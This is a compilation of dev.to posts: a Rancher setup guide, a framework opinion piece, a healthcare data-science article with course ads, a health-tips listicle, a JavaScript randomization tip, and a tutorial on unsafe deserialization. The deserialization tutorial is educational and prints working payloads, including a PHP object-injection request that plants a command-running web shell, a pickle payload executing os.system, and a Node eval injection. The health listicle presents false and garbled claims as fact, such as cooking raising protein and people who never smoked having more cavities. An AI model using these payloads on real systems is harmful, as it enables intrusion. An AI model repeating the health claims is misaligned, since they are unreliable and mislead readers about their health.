1,189,689 | Temel Rancher kurulumu | Rancher hakkında temel ve sözel bir dokümanı "Rancher'a giriş" olarak Medium üzerinde paylaşmıştım.... | 0 | 2022-09-10T14:01:14 | https://dev.to/aciklab/temel-rancher-kurulumu-9hb | rancher, k8s, kubernetes, docker | Rancher hakkında temel ve sözel bir dokümanı "[Rancher'a giriş](https://aliorhun.medium.com/ranchera-giri%C5%9F-390506d68b2)" olarak Medium üzerinde paylaşmıştım. Şimdi ise hedefimiz elimizi biraz daha kullanıma alıştırmak olacak.
First of all, I should mention that I'm using the Ubuntu 20.04 server edition on a virtual machine. Since different distributions may have different dependencies, if you're just getting started it's best to stick with the same version.
# Preparations and Docker installation
After logging into the virtual machine with your own user, we need to switch to an administrator account and install the following package:
```bash
sudo apt install docker.io
```
After this step Docker will be installed, but I care about being able to run Docker as a non-sudo user as well. To do that, run the following two commands with administrator privileges, substituting your own username:
```bash
sudo usermod -aG docker USERNAME
newgrp docker
```
To have Docker start on boot, you can run the following command:
```bash
sudo systemctl enable docker
```
After this step, the virtual machine should be rebooted. This is especially important so that the unprivileged user's permission to use Docker takes effect.
# Installing Rancher
Once the system has restarted, we no longer need administrator privileges. After logging in with our normal user, we install Rancher Server using the following command:
```bash
docker run -d --name=rancher-server --restart=unless-stopped -p 80:80 -p 443:443 --privileged rancher/rancher:stable
```
Pulling the Docker images and starting the container may take about a minute, after which the web interface becomes accessible on ports 443 and 80.
# Logging into the Rancher web interface
As of this writing, the latest stable version appears to be v2.6.8. When you visit the virtual machine's IP address in your web browser, it will tell you to look up your password. To do so, run the command below; if Rancher came up without problems, the password should show up in the output.
```bash
docker logs rancher-server 2>&1 | grep "Bootstrap Password:"
```
After entering that password and changing it to a new, strong one, you will be greeted with a screen like the one below. Of course, since I have dark mode enabled, yours may look a bit different.

And of course, you can close the clutter here with the X buttons in the top-right corners so that the page shows what it is really for: listing your clusters.
# "local" küme
When you enter the web interface, the first thing that may catch your attention is that a local cluster has already been created with the k3s Kubernetes provider. This lets you start taking advantage of Kubernetes right away.
We can say that this cluster contains the following Kubernetes components:
* Etcd
* Scheduler
* Controller Manager
Once inside the cluster, you can see basic information such as the number of pods, CPU cores, and the amount of memory. Of course, you can later use the Helm package manager to set up Prometheus and Grafana for more detailed metrics.
I'm planning to follow up with a few more posts on these topics, but for an introduction, understanding these steps is the most important thing. | aliorhun |
1,190,444 | React vs Solid - Seriously? | There is no contest. SolidJS is faster, better, and easier to learn and maintain. If you're already... | 0 | 2022-09-11T19:16:25 | https://dev.to/chadsteele/react-vs-solid-seriously-4j7p | react, solidjs, redux, javascript | There is no contest.
SolidJS is faster, better, and easier to learn and maintain. If you're already a React developer, you're already a Solid developer. You'll just type a lot less in Solid and spend less time debugging. If your company is still investing in React in any way at all, you're wasting lots of time and money. Enjoy.

Start here https://www.solidjs.com/tutorial/introduction_basics
It's fun!
| chadsteele |
1,210,426 | Know The Application of Data Science in the Healthcare Industry | The individual's health is now separated from the frequent life-or-death decisions made at the... | 0 | 2022-10-04T06:14:27 | https://dev.to/poo727/know-the-application-of-data-science-in-the-healthcare-industry-1am5 | datascience, datasciencecourse, datasciencecourseinbangalore, artificialintelligencecourse |
The individual's health is now separated by many layers from the frequent life-or-death decisions made at the insurance level of the healthcare system. While it makes sense for insurance companies, which are trying to limit costs, to serve as gatekeepers for authorizing medical treatments, the process is usually managed by people who are neither licensed medical professionals nor experts in the field of medicine. The severe compliance requirements placed on medical personnel are one of the main problems with health care. There should be checks and balances between the medical profession and the pooled-risk insurance corporations.
For example, obtaining pre-authorizations for medical treatment is still frequently done via fax machines. It seems incredible that such a dated approach, which can decide whether or not someone receives medical treatment, is still in use in the 21st century when almost everything is now shared digitally. As each health insurance has variable degrees of coverage for a wide range of procedures and treatments, doctors, physician assistants, and other medical office personnel spend upwards of 20 hours each week contacting and arranging with the many health insurers.
**How Can Data Science Help Improve the Health Care System?**
The high cost and fragmented nature of American healthcare may be addressed by technology in general and machine learning and AI in particular. The healthcare system generates massive amounts of data. Data scientists can use it to enhance patient outcomes, help people who are likely to develop chronic diseases change their behaviors, advance precision medicine, and simplify the digital sharing of patient records while still adhering to HIPAA regulations.
**Smart Rooms**
IBM and the University of Pittsburgh Medical Center started working together in 2005 to build a hospital "smart room" where connected devices would help streamline the workflow of front-line employees. The suggested features for the smart rooms range from voice-activated temperature settings to alerting nurses when a patient leaves their bed to recognizing employees when they enter a patient's room. The series of tasks for a caregiver, based on their assigned role for patient care, will be analyzed and automatically prioritized with respect to the specific patient's condition and treatment protocol, thanks to the use of machine learning and AI technologies.
Advanced algorithms can monitor caregiver workload management and notify patient care management when staffing levels need to be increased, when routine work is likely to be behind schedule, and when workloads should be automatically redistributed to available medical personnel. According to IBM's white paper, such implementations demonstrate a 60% improvement in nursing documentation. The majority, if not all, of data scientists' principal duties include developing the prediction algorithms that serve as the brains of a fully functional smart room system. Although data scientists don't build front-end technological instruments, they create the algorithms needed to react to human contact, forecast and change human behavior, and provide recommendations.
**AI and Robotic Surgery**
One of the most complicated and dangerous specialties in medicine is surgery. Depending on the type of surgery, the patient may spend an hour or many hours on the operating table as the surgeon and their surgical team work to protect the patient's life before, during, and after the procedure. However, surgeons' skills and physical capabilities differ. Although it is extremely unsettling, if not terrifying, to consider that surgeons can make errors, they do - after all, they are people. Enter the world of artificial intelligence and robotics, which can keep an eye on a surgeon's movements, assist precision decision-making by giving the surgeon prompt feedback throughout the surgical process and for the patient following the surgery, and collaborate with the surgeon by performing particular surgical techniques.
Check out the IBM-accredited [artificial intelligence course in Bangalore](https://www.learnbay.co/artificial-intelligence-ai-course-training-bangalore) for detailed information.
At first glance, this looks like a simple algorithmic implementation. The complexity of human physiology, however, necessitates collecting and analyzing vast amounts of information regarding the patient, the surgeon, and the robotic component of this intricate equation. This is where data scientists can bridge the gap between human and robotic engagement by creating an intelligent algorithmic analytics system that continuously updates itself based on a constant stream of environmental data. By working with medical and robotics professionals, data scientists can do much more than develop AI that teaches itself to play chess; they can contribute to saving lives.
**Wearable Technology and Behavior Modification**
Fitbits, Apple Watches, heart rate monitors, and other medical gadgets and fitness trackers that give consumers rapid feedback are already in popular use. Millions of individuals use smartphones and accompanying apps to monitor their activity levels, sleeping habits, water consumption, macronutrients, blood glucose levels, and calorie expenditure. This is where behavior modification meets healthcare costs: AI algorithms can inform users of the predicted likelihood that a behavior will not only raise their risk of acquiring a chronic health condition but also increase their health care expenses. Insurers and healthcare providers can use this information to automatically adjust health insurance premiums and co-pay amounts or, more precisely, tailor a treatment regimen for an existing ailment.
The user is swiftly informed of their choice's financial and health repercussions, but they are still free to continue the activity or stop it immediately.
**Precision Medicine and Digital Health Records**
Training an algorithm to recognize and correctly categorize a set of images is one of the first topics covered in many machine learning courses. This maps directly onto using AI for medical imaging, where the algorithm offers real-time analytics of a CT scan, X-ray, MRI, or other image type. The procedure can be taken several stages further by providing a predicted diagnosis, determining whether additional tests are necessary, outlining which tests should be included, and recommending a course of treatment.
The patient's primary care doctor, a medical specialist, or any other healthcare practitioner to whom they have already granted access to their private health information may receive all of this information. In the end, healthcare professionals and patients must maintain their autonomy in decision-making and collaborate with AI rather than being subjected to an algorithm that, despite being programmed by people, lacks the full range of human emotions such as empathy and compassion.
Data scientists are more than just computational quantifiers kept in the dark about the outcomes of their labor. They serve as a human bridge between the complicated world of human psychology and physiology and the computational world of machines.
**Conclusion**
The collaborative support of data scientists who have developed experience inside the health care business can help make decisions at all levels more rapidly, more precisely, and with fewer layers of bureaucracy. One career path is to start as a data analyst or junior data scientist for a health insurer or other healthcare organization if you're interested in becoming a data scientist in the field but haven't yet had any exposure to it. Make sure to take [data science courses in Bangalore](https://www.learnbay.co/data-science-course-training-in-bangalore) if you are just starting your formal education as a data scientist in a healthcare organization.
| poo727 |
1,257,860 | Healthy living: 6 ways to live healthily without breaking the bank | Healthy living is an important part of leading a healthy life. It is also something many... | 0 | 2022-11-15T14:34:52 | https://dev.to/bibogi22/vida-saludable-6-formas-de-vivir-sano-sin-arruinarse-m63 | vida | Healthy living is an important part of leading a [healthy lifestyle](https://inass14.blogspot.com/2022/10/como-vivir-un-estilo-de-vida-saludable.html). It is also something many people struggle with because they don't know how to achieve it. The good news is that there are many simple steps you can take to improve your diet and exercise routine, which will help you lead a healthier lifestyle without breaking the bank. In this article we will look at six ways to improve your health without going broke:

## Eat plenty of fruit and vegetables.
Fruit and vegetables are good for your health. They provide vitamins and minerals, which are important for keeping your body healthy.
Fruit and vegetables can be eaten raw or cooked. If you don't like the taste of certain fruits or vegetables, try eating them with other foods, such as eggs or beans, instead of as plain fruit juice (or water). You can even mix frozen berries into your cereal.
You might think that cooking removes the nutrients from a meal, but this isn't true: cooking only increases the amount of protein in food because our bodies find it easier to absorb those nutrients when they are combined with heat-sensitive amino acids such as leucine, lysine, methionine, and tryptophan (which make up between 60% and 80%, respectively).
## Drink water (at least 8 glasses a day)
Water is the most abundant substance on the planet. It makes up 70% of your body weight and carries nutrients to every cell in your body. Yet many people don't drink enough water each day.
Drinking plenty of water helps you maintain a healthy body weight and prevent dehydration, because it helps flush out toxins, regulates temperature and blood pressure, strengthens bones and muscles, aids digestion by removing waste products from the digestive tract so food can be digested properly (especially important if you have any kind of chronic illness), improves kidney function by removing excess minerals from the bloodstream so they don't form deposits in your joints or elsewhere in your body, and much more!
Drink more when you are active or exercising: working out for an hour or more burns around 20 ounces of fluid per pound, compared with just a brisk 10-minute walk, which burns only about 2 ounces per pound - mainly because movement demands an oxygen supply and far more energy than sitting still.
## Don't drink alcohol
Alcohol is a depressant, which means it slows down the body's functions. It can also lead to alcoholism and other health problems.
Drinking alcohol can damage your liver, so you should avoid it if you are already ill or have a chronic condition such as diabetes or high blood pressure. Regular drinking contributes to weight gain, since the body needs extra calories to digest food and to build new cells for growth (proliferation) as well as maintain existing ones (maintenance). In the long run this can affect your health in many areas, including heart disease, cancer risk, and dementia later in life.
## Don't smoke
Smoking is bad for your health. It can cause cancer, heart disease, and stroke. It also damages your teeth, turning them yellow and making them prone to cavities. Even if you don't smoke, tobacco affects your body in other ways:
- Lungs: smokers have a higher risk of lung cancer than non-smokers.
- Mouth: people who smoke have more cavities than non-smokers (and this is true even if they have never smoked).
## Keep a positive attitude; think good thoughts.
You can keep a positive attitude by thinking good thoughts. A good thought is one that gives you energy, makes you feel happy and confident, and helps you do the things in life that fulfill you.
Avoid negative thoughts as much as possible, because they will only make things worse for you and those around you. For example, if someone posts something insulting about another person on their Facebook page (whether it's true or not), try not to dwell on it and instead think about how good the people around you at school or work are.
## Get rid of stress. Learn to relax, perhaps with meditation or yoga.
A healthy lifestyle goes beyond the food you eat. It's about how you feel and what stress does to your body. Stress can cause many health problems, including heart disease and diabetes.
Stress can be caused by many things, such as work, money, family, or other responsibilities. If these things stress you out too much, it may be time for a change. Relaxation techniques - such as meditation or yoga - can help relieve stress and improve your overall mental well-being.
## Exercise regularly, even when you are sick.
Exercise is a great way to stay healthy. When you are sick, it is especially important to raise your activity level and keep your body moving.
Walk around the house, or go for a walk outdoors if you can. If you have a cold or the flu, try to walk as slowly as possible so your body doesn't overheat or sweat too much - that can make things worse!
Do stretching exercises like the ones in this video: "Stretching will make you feel better when you have the flu." It may hurt at first, but once you get used to it (and maybe even come to enjoy it), stretching will help you prevent injuries when you exercise later on!
## Spend time with your friends and family - they can help you through difficult times.
Spending time with your friends and family can help you feel better.
It's hard to be alone when you're sick, so it's important to spend time with your loved ones. If they are sick too, they will understand what you're going through and may even have tips on how to get better faster.
Takeaway: with these simple steps you can live a healthy life without breaking the bank.
You can live a healthy life without spending a lot of money. All it takes is some creativity and the right resources. A healthy lifestyle is about more than diet and exercise, but it includes both, along with time spent with friends and family.
### Conclusion
We hope these tips help you live a healthier life. Remember, it's never too late to start living a healthier lifestyle. As we said before, only by taking action and making small changes in your life can you have a positive impact on your health for years to come.
Article source | [BfS H22 PLuS](https://inass14.blogspot.com/) | bibogi22 |
1,264,253 | Randomizing Array Elements | If the Math.random() function didn't work for you it's okay. As a newbie to coding, it took me over a... | 0 | 2022-11-21T14:14:30 | https://dev.to/juliannehuynh/randomizing-array-elements-21o5 | javascript, vscode, programming, firstpost | If the Math.random() function didn't work for you it's okay. As a newbie to coding, it took me over a day for it to work it's magic. There are a number of ways to create a random return but I found this to be the cleanest way that made the most sense. The syntax behind this code may seem a little dauting but once you break it down it's much simpler than you think.

Here we have an array of dog names. To pick a random name, the function is called on the array, dogs. Math.random() returns a decimal between 0 (inclusive) and 1 (exclusive). Multiplying it by the length of the array, array.length, produces a number anywhere from 0 up to (but not including) the length, covering every element in the array. Math.floor() then rounds that number down to the nearest whole integer, so the result is always a valid index - you'll never get a fraction of a name.
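The pattern described above can be sketched like this (the dog names here are placeholders, since the original list lives in the screenshot):

```javascript
// Placeholder array of dog names
const dogs = ["Rex", "Bella", "Max", "Luna", "Charlie"];

// Math.random() gives 0 <= n < 1, so multiplying by array.length
// and flooring always produces a valid index 0 .. array.length - 1
function randomDog(array) {
  return array[Math.floor(Math.random() * array.length)];
}

console.log(randomDog(dogs)); // logs one of the five names at random
```

Because Math.random() never returns 1, the computed index can never equal array.length, so there is no risk of an out-of-bounds access.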
| juliannehuynh |
1,292,038 | An Unsafe Deserialization Vulnerability and Types of Deserialization | Deserialization Unsafe Deserialization (also referred to as Insecure Deserialization) is... | 0 | 2022-12-10T20:30:31 | https://dev.to/tutorialboy/an-unsafe-deserialization-vulnerability-and-types-of-deserialization-1mcg |

## Deserialization
Unsafe Deserialization (also referred to as Insecure Deserialization) is a vulnerability wherein malformed and untrusted data input is insecurely deserialized by an application. It is exploited to hijack the logic flow of the application and might result in the execution of arbitrary code. Although this isn't exactly a simple attack to employ, it features in the most recent iteration of the OWASP Top 10 as part of the Software and Data Integrity Failures risk, due to the severity of impact upon compromise.

The process of converting an object state or data structure into a storable or transmissible format is called serialization. Deserialization is its opposite - the process of extracting the serialized data to reconstruct the original object version.
Unsafe Deserialization issues arise when an attacker is able to smuggle crafted malicious data into user-supplied input that the application deserializes. This can result in arbitrary object injection into the application, altering its intended behavior.
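To ground the terminology, here is a minimal round trip using a data-only format (JSON via Python's standard library - the safe approach this article recommends later):

```python
import json

# Serialization: turn an in-memory structure into a storable/transmissible string
state = {"user": "alice", "role": "admin", "score": 42}
wire = json.dumps(state)

# Deserialization: reconstruct the original structure from that string
restored = json.loads(wire)
assert restored == state
```

Because JSON can only express primitive values, lists, and maps - never live objects with behavior - deserializing it cannot instantiate attacker-chosen classes.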
## Impact
A successful Unsafe Deserialization attack can result in the full compromise of the confidentiality, integrity, and availability of the target system, and the oft-cited Equifax breach is probably the best example of the worst outcome that can arise. In Equifax's case, an unsafe Java deserialization attack leveraging the Struts 2 framework resulted in remote code execution, which, in turn, led to one of the largest data breaches in history.
## Prevention
It is important to consider any development project from an architectural standpoint to determine when and where serialization is necessary. If it is unnecessary, consider using a simpler format when passing data.
In cases where it is impossible to forego serialization without disrupting the application’s operational integrity, developers can implement a range of defence-in-depth measures to mitigate the chances of being exploited.
- Use serialization that only permits primitive data types.
- Use a serialization library that provides cryptographic signature and encryption features to ensure serialized data are obtained untainted.
- Authenticate before deserializing.
- Use low-privilege environments to isolate and run code that deserializes.
- Finally, if possible, replace object serialization with data-only serialization formats, such as JSON.
## Testing
Verify that serialization is not used when communicating with untrusted clients. If this is not possible, ensure that adequate integrity controls (and possibly encryption if sensitive data is sent) are enforced to prevent deserialization attacks including object injection.
OWASP ASVS: 1.5.2, 5.5.1, 5.5.3
## Types of Deserialization

## Unsafe Deserialization in .NET
### Vulnerable Example
The .NET framework offers several instances of deserialization. Developers will likely be familiar with the following example, where some untrusted binary data is deserialized to create some objects:
```
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;

[Serializable]
public class SomeClass
{
    public string SomeProperty { get; set; }
    public double SomeOtherProperty { get; set; }
}

class Program
{
    static void Main(string[] args)
    {
        BinaryFormatter binaryFormatter = new BinaryFormatter();
        MemoryStream memoryStream = new MemoryStream(File.ReadAllBytes("untrusted.file"));
        SomeClass obj = (SomeClass)binaryFormatter.Deserialize(memoryStream);
        Console.WriteLine(obj.SomeProperty);
        Console.WriteLine(obj.SomeOtherProperty);
    }
}
```
The above program happily deserializes whatever it is given: although a class cast error is raised for objects that are not instances of SomeClass, deserialization itself has already run by that point, which might be enough to trigger dangerous behaviors. For example, a malicious user could leverage publicly available tools such as ysoserial.net to easily craft payloads that exploit the presence of external libraries, and thus build a chain of gadgets that eventually leads to RCE.
Alternatively, an attacker with knowledge of the source code of the application could attempt to locate dangerous classes in the code base. For example, suppose that somewhere in the application, the following class is defined:
```
[Serializable]
public class DangerousClass
{
    private string path;

    public DangerousClass(string path)
    {
        this.path = path;
    }

    // Finalizer: runs when the garbage collector reclaims the object
    ~DangerousClass()
    {
        File.Delete(path);
    }
}
```
The attacker is then able to build such objects locally using an arbitrary path as a parameter, serialize it, and finally feed it to the vulnerable application. When said object is eventually removed from memory by the garbage collector, the attacker gains the ability to delete arbitrary files in the system.
## Prevention
Never pass user-supplied input to BinaryFormatter; the documentation states this explicitly:
> The BinaryFormatter type is dangerous and is not recommended for data processing. Applications should stop using BinaryFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. BinaryFormatter is insecure and can't be made secure.
When possible, developers are encouraged to use other forms of data serialization, such as XML, JSON, or the BinaryReader and BinaryWriter classes. The latter is the recommended approach for binary serialization. For example, in the above scenario, the serialization phase could be implemented as:
```
var someObject = new SomeClass();
someObject.SomeProperty = "some value";
someObject.SomeOtherProperty = 3.14;

using (BinaryWriter writer = new BinaryWriter(File.Open("untrusted.file", FileMode.Create)))
{
    writer.Write(someObject.SomeProperty);
    writer.Write(someObject.SomeOtherProperty);
}
```
And in turn, the deserialization phase as:
```
var someObject = new SomeClass();

using (BinaryReader reader = new BinaryReader(File.Open("untrusted.file", FileMode.Open)))
{
    someObject.SomeProperty = reader.ReadString();
    someObject.SomeOtherProperty = reader.ReadDouble();
}
```
## References
- [OWASP - Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#java)
- [Wikipedia - Serialization](https://en.wikipedia.org/wiki/Serialization)
- [Microsoft - BinaryFormatter security guide](https://docs.microsoft.com/en-us/dotnet/standard/serialization/binaryformatter-security-guide)
## Unsafe Deserialization in Java
Java implements serialization natively for objects that implement the Serializable interface via the ObjectInputStream and ObjectOutputStream facilities. The binary format directly references classes by name, and these classes are loaded dynamically provided they are on the class path. This potentially allows instantiating objects of classes the developer never intended, so it is very important that untrusted data is not deserialized as-is.
Developers may customize some aspects of the serialization process by providing callbacks such as writeReplace and readResolve. This could be exploited by an attacker to build chains by building complex objects that eventually lead to code execution or other actions on the target. Especially when complex and well-known libraries and frameworks are used, attackers may leverage publicly available tools such as ysoserial to easily craft the appropriate payload.
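To see concretely why merely reading an untrusted stream is dangerous, here is a self-contained sketch (the class names are hypothetical, and the hook only prints instead of executing anything) showing that a class's private readObject callback runs during deserialization, before the caller ever casts or inspects the result:

```java
import java.io.*;

public class DeserializationCallbackDemo {
    public static boolean hookRan = false;

    // Hypothetical class: its readObject hook fires as soon as the stream is read
    static class SideEffect implements Serializable {
        private String command;
        SideEffect(String command) { this.command = command; }

        private void readObject(ObjectInputStream in)
                throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            // A real gadget might pass `command` to Runtime.exec here;
            // we just record and print to demonstrate the code path.
            hookRan = true;
            System.out.println("readObject ran with: " + command);
        }
    }

    public static void main(String[] args) throws Exception {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(new SideEffect("id > /tmp/proof"));
        }
        try (ObjectInputStream in = new ObjectInputStream(
                new ByteArrayInputStream(bytes.toByteArray()))) {
            in.readObject(); // the hook fires here, before any cast or use
        }
    }
}
```

The key point is that the attacker-controlled stream, not the calling code, decides which readObject implementations execute.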
### Vulnerable Example
The following Spring controller uses the data coming from the client request to deserialize an object:
```
@Controller
public class MyController {

    @RequestMapping(value = "/", method = GET)
    public String index(@CookieValue(value = "myCookie") String myCookieString)
            throws IOException, ClassNotFoundException {
        // decode the Base64 cookie value
        byte[] myCookieBytes = Base64.getDecoder().decode(myCookieString);
        // use those bytes to deserialize an object
        ByteArrayInputStream buffer = new ByteArrayInputStream(myCookieBytes);
        try (ObjectInputStream stream = new ObjectInputStream(buffer)) {
            MyObject myObject = (MyObject) stream.readObject();
            // ...
        }
    }
}
```
### Prevention
Never pass user-supplied input to the Java deserialization mechanism, and opt for data-only serialization formats such as JSON.
If the deserialization of untrusted data is really necessary, consider adopting an allow list approach to only allow objects of certain classes to be deserialized.
Since Java version 9, it has been possible to specify a deserialization filter in several ways. One example is to use the setObjectInputFilter method for ObjectInputStream objects before their use. The setObjectInputFilter method takes, as an argument, a method that implements the filtering logic. The following filter only allows one to deserialize instances of the MyClass class:
```
ObjectInputStream objectInputStream = new ObjectInputStream(buffer);
objectInputStream.setObjectInputFilter(MyFilter::myFilter);
```

Where:

```
public class MyFilter {
    static ObjectInputFilter.Status myFilter(ObjectInputFilter.FilterInfo info) {
        Class<?> serialClass = info.serialClass();
        if (serialClass != null) {
            return serialClass.getName().equals(MyClass.class.getName())
                    ? ObjectInputFilter.Status.ALLOWED
                    : ObjectInputFilter.Status.REJECTED;
        }
        return ObjectInputFilter.Status.UNDECIDED;
    }
}
```
Alternatively, it is possible to implement a similar solution by specializing the implementation of the ObjectInputStream object. The following snippet only allows one to deserialize instances of the MyClass class:
```
public class MyFilteringInputStream extends ObjectInputStream {
    public MyFilteringInputStream(InputStream inputStream) throws IOException {
        super(inputStream);
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass objectStreamClass) throws IOException, ClassNotFoundException {
        if (!objectStreamClass.getName().equals(MyClass.class.getName())) {
            throw new InvalidClassException("Forbidden class", objectStreamClass.getName());
        }
        return super.resolveClass(objectStreamClass);
    }
}
```
It is then possible to invoke the deserialization in the usual way:
```
ObjectInputStream objectInputStream = new MyFilteringInputStream(buffer);
objectInputStream.readObject();
```
### References
- [OWASP - Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#java)
- [Wikipedia - Serialization](https://en.wikipedia.org/wiki/Serialization)
- [Oracle - Serializable](https://docs.oracle.com/javase/7/docs/api/java/io/Serializable.html)
- [Oracle - Serialization Filtering](https://docs.oracle.com/javase/10/core/serialization-filtering1.htm)
- [GitHub - ysoserial](https://github.com/frohoff/ysoserial)
## Unsafe Deserialization in NodeJS
### Vulnerable Example
Unlike PHP or Java, Node.js (JavaScript) does not provide advanced forms of object serialization, yet the JSON (JavaScript Object Notation) format is often used to convert JavaScript data objects to and from a string representation. Before the relatively recent addition of the JSON.parse method to ECMAScript, developers used to deserialize objects using the eval function. The following snippet illustrates this bad practice:
```
function myJSONParse(data) {
return eval(`(${data})`);
}
```
If data is controlled by the attacker, it becomes trivial to inject arbitrary JavaScript code. For example, the following invocation executes a shell script that writes the output of the id command to /tmp/proof:
```
myJSONParse("require('child_process').exec('id > /tmp/proof')");
```
### Prevention
The correct way to serialize and deserialize JavaScript objects is to use the provided JSON global object. For example:
```
const object = {foo: 123};
JSON.stringify(object) // '{"foo":123}'
JSON.parse('{"foo":123}') // { foo: 123 }
```
### References
- [Wikipedia - Serialization](https://en.wikipedia.org/wiki/Serialization)
- [OWASP - OWASP Top 10:2021 Software and Data Integrity Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/)
- [MDN - JSON](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/JSON)

## Unsafe Deserialization in PHP
PHP uses the native serialize() and unserialize() functions to serialize and deserialize objects. For example, the following script creates an instance of the FSResource class, serializes it, and then prints the string representation of the object.
```
<?php

class FSResource {
    function __construct($path) {
        $this->path = $path;
        if (file_exists($path)) {
            $this->content = file_get_contents($path);
        }
    }

    function __destruct() {
        file_put_contents($this->path, $this->content);
    }
}

$resource = new FSResource('/tmp/file');
print(serialize($resource));

# Prints the following string representation:
# O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}
```
The string representation can then be deserialized again to recreate the object instance and access its attributes.
```
$instance = unserialize('O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}');
print($instance->path);
# Prints the path attribute:
# /tmp/file
```
### Vulnerable Example
The exploitation of deserialization in PHP is called PHP Object Injection, which happens when user-controlled input is passed as the first argument of the unserialize() function. This is a vulnerable script.php:
```
<?php
$instance = unserialize($_GET["data"]);
```
To be exploitable, the vulnerable piece of code must have enough PHP code in scope to build a working POP (Property-Oriented Programming) chain: a chain of reusable PHP code that causes a meaningful impact when invoked. The chain usually starts by triggering the __destruct() or __wakeup() PHP magic methods, called when the object is destroyed or deserialized, in order to call other gadgets and conduct malicious actions on the system.
If the class FSResource defined in the paragraph above is in scope, an attacker could send an HTTP request containing a serialized representation of an FSResource object that creates a malicious PHP file at path, with arbitrary content, when the __destruct() magic method is called upon destruction.
```
http://localhost/script.php?data=O:10:%22FSResource%22:2:{s:4:%22path%22;s:9:%22shell.php%22;s:7:%22content%22;s:27:%22%3C?php%20system($_GET[%22cmd%22]);%22;}
```
The payload above decodes as O:10:"FSResource":2:{s:4:"path";s:9:"shell.php";s:7:"content";s:27:"<?php system($_GET["cmd"]);";} and, when deserialized, it creates the shell.php file, allowing the attacker to run arbitrary commands on the system. More complex payloads can be built by chaining code from multiple classes or by reusing public POP chains such as the ones included in the PHPGGC project.
### Prevention
Never use the unserialize() function on user-supplied input, and preferably use data-only serialization formats such as JSON. If you need to use PHP deserialization, a second optional parameter has been added in PHP 7 that enables you to specify an allow list of allowed classes.
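A minimal sketch of that allow list parameter (MyClass here is a placeholder for whatever types you actually expect):

```php
<?php

class MyClass {
    public $value = 42;
}

$payload = serialize(new MyClass());

// Only instances of MyClass may be reconstructed; any other class in the
// payload comes back as __PHP_Incomplete_Class instead of a live object.
$obj = unserialize($payload, ['allowed_classes' => [MyClass::class]]);

// To reject all objects and keep only scalars/arrays, pass false:
$safe = unserialize($payload, ['allowed_classes' => false]);

var_dump($obj instanceof MyClass);                 // bool(true)
var_dump($safe instanceof __PHP_Incomplete_Class); // bool(true)
```

Note that the allow list prevents arbitrary object instantiation but does not make unserialize() safe in general - gadgets inside the allowed classes themselves can still be abused, so JSON remains the preferred option.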
### References
- [Wikipedia - Serialization](https://en.wikipedia.org/wiki/Serialization)
- [PHP - unserialize](https://www.php.net/manual/en/function.unserialize.php)
- [OWASP - PHP Object Injection](https://www.owasp.org/index.php/PHP_Object_Injection)
- [POC 2009 - Stefan Esser - Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
- [Black Hat USA 2010 - Stefan Esser - Utilizing Code Reuse in PHP Application Exploits](https://www.owasp.org/images/9/9e/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf)
- [PHPGGC](https://github.com/ambionics/phpggc)
## Unsafe Deserialization in Python

### Vulnerable Example
Python provides a native solution for this problem - the pickle library. The following Flask endpoint provides an example where untrusted data is fed into the pickle.loads function:
```
import pickle

from flask import Flask, request

app = Flask(__name__)

@app.route("/import_object", methods=['POST'])
def import_object():
    data = request.files.get('user_file').read()
    user_object = pickle.loads(data)
    store_in_database(user_object)
    return 'OK'
```
A malicious user could craft a payload that evaluates as code when unpickled. The Python program below outputs a payload that executes a system command when processed by pickle.loads:
```
import pickle
import os

class Pickle(object):
    def __reduce__(self):
        return os.system, ('id > /tmp/proof',)

o = Pickle()
p = pickle.dumps(o)
print(p)
```
The __reduce__ method provides the logic used to serialize/deserialize the object. When a tuple is returned, the first element is a callable, and the second represents its arguments. Thus, it is possible to execute system commands by using the os.system function. In the above case, the payload writes the output of the id command to /tmp/proof. Here is an example:
```
sf@secureflag.com:~$ python3 generate.py
b'\x80\x03cposix\nsystem\nq\x00X\x0f\x00\x00\x00id > /tmp/proofq\x01\x85q\x02Rq\x03.'
sf@secureflag.com:~$ python3
>>> import pickle
>>> pickle.loads(b'\x80\x03cposix\nsystem\nq\x00X\x0f\x00\x00\x00id > /tmp/proofq\x01\x85q\x02Rq\x03.')
0
sf@secureflag.com:~$ cat /tmp/proof
uid=1000(sf) gid=1000(sf) groups=1000(sf)
```
### Prevention
The pickle library’s documentation discourages the unpickling of untrusted data and suggests using data-only serialization formats such as JSON.
If you really need to unserialize content from an untrusted source, consider implementing a message authentication code (MAC) to ensure the data integrity of the payload.
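A minimal sketch of that MAC approach, assuming a secret key shared out of band between the writer and the reader (hmac, hashlib, and pickle are all in the standard library):

```python
import hashlib
import hmac
import pickle

SECRET_KEY = b'replace-with-a-real-secret'  # assumption: distributed out of band

def dumps_signed(obj):
    """Serialize obj and prepend an HMAC-SHA256 tag over the pickle bytes."""
    data = pickle.dumps(obj)
    tag = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    return tag + data

def loads_signed(blob):
    """Verify the tag before unpickling; refuse tampered payloads."""
    tag, data = blob[:32], blob[32:]  # SHA-256 digests are 32 bytes
    expected = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("payload failed integrity check - not unpickling")
    return pickle.loads(data)

blob = dumps_signed({"user": "alice"})
print(loads_signed(blob))  # {'user': 'alice'}
```

The crucial detail is that verification happens before pickle.loads ever runs, so a forged or modified payload is rejected without executing any of its gadgets. This protects integrity only; it does not make it safe to unpickle data signed by an untrusted party.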
### References
- [OWASP - Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html)
